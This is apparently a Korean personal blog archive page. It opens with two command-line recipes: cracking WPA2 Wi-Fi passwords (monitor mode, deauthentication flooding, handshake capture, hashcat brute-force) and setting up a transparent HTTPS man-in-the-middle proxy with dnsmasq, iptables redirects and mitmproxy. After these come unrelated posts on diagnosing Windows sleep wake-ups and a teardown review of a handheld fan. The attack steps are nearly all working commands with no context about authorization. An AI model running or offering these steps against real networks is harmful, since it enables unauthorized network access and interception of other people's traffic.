Category Archives: Uncategorized

WPA2 Crack with hashcat

WPA2는 인증할때 salt와 kdf2값의 패킷을 수집하여 이를 BF 또는 Dict 공격하는 방법이 있다.

Enter wlan interface to monitor mode

airmon-ng start wlp4s0
airmon-ng check kill
rfkill list
rfkill unblock [dev_id]

Scan APs

airodump-ng -c 5 wlp4s0mo [–band a (for 5ghz)]
airodump-ng –bssid [bssid] -c 6 –write packet wlp4s0mo

Send Deauth Packet

aireplay-ng –deauth 100 -a [Station] wlp4s0mo

Convert cap to haccpx – out dated way

cap2hccapx.bin packet-01.cap out.haccpx

Convert cap to hc22000

hcxpcapngtool -o hash.hc22000 -E wordlist dumpfile.pcapng

Run hashcat

hashcat -m 2500 out.hccapx -a3 -?d?d?d?d?d?d?d?d -w3

hashcat -m 22000 hash.hc22000 wordlist.txt

or use aircrack-ng

$ aircrack-ng dumpfile.pcapng -w wordlist.txt

HTTPS MITM with transparent mode

 

set ipaddress for client adaptor

Edit /etc/network/interfaces:

# Proxy Server network interface
auto eth1
iface eth1 inet static
address 192.168.3.1
netmask 255.255.255.0
gateway 0.0.0.0

solve 53 port confiliction

# vi /etc/systemd/resolved.conf   > DNSStubListener=no
# systemctl restart systemd-resolved

config dnsmasq

Then replace /etc/dnsmasq.conf with:

# Listen for DNS requests on the internal network
interface=eth1
# Act as a DHCP server, assign IP addresses to clients
dhcp-range=192.168.3.10,192.168.3.100,96h
# Broadcast gateway and dns server information
dhcp-option=option:router,192.168.3.1
dhcp-option=option:dns-server,192.168.3.1

# systemctl restart dnsmasq

Sysctls

sysctl -w net.ipv4.ip_forward=1
sysctl -w net.ipv6.conf.all.forwarding=1
sysctl -w net.ipv4.conf.all.send_redirects=0

Rrerouting

iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 443 -j REDIRECT --to-port 8080

Start mitmproxy

$ mitmweb --mode transparent --showhost

https://docs.mitmproxy.org/stable/concepts-modes/#socks-proxy

https://docs.mitmproxy.org/stable/howto-transparent/

https://nickcharlton.net/posts/transparent-proxy-virtual-machines-mitmproxy.html

윈도 절전모드 관리

잠잘땐 확실하게 자야되는데 재워놓은애가 가끔 멋대로 깰때가 있다.
아래 내용 확인하면 어느정도 잘자는듯?

타이머 확인

powercfg -waketimers

디바이스 확인

powercfg -devicequery wake_armed

마지막 원인 확인

powercfg -lastwake

윈도우 자동업데이터

MoUsoCoreWorker.exe
usocoreworker.exe

앤쓰리 데빌팬 휴대용선풍기 리뷰

손풍기가 필요한 찰나 손풍기에 BLDC가 들었대서 사봤다.

가벼운데 배터리 용량이 좀 아쉽다

샀으면 뜯어야지,

 

2000mAh짜리 18650가 직결되어있다. 보호회로가 있는거같은데 안뜯어봄 ㅇㅇ..
좀 쓰다 사용시간좀 딸린다 싶으면 3000mAh 이상으로 바꿔야지…

 

BMS로 FM5001H 가 들어있다. 충전 속도 0.6A 라는데? ㅋㅋ 뻥스펙 확정! 어쩐지 충전하는데 1A 안들어가더라

特点
 0.6A 锂电池充电
 支持 9V 电机驱动控制,3 档风量可调
 支持单按键开关
 充电电压精度:±1.0%;升压电压精度:±4.0%
 过流保护(OCP),过压保护(OVP),短路保护(SCP),过温保护(OTP)
 ESD 2KV,可靠性高
 极低的 BOM 成本
 待机电流 30uA
 支持 4.2、4.35V 电池
 封装形式:ESOP8

풍속조절은 다음과 같이 전압으로 한단다.

一档 5.4V,二档 7.3V,三档 9.2V

또한 충전중에는 1단 고정(아왜!)

진짜 BLDC를 썼는지는 팬쪽을 뜯어야하는데 이쁘게 다시 조립할 자신이 없어서 모터쪽에 MA477 홀센서가 달려있는것만 확인했다. 뭐 맞겠지.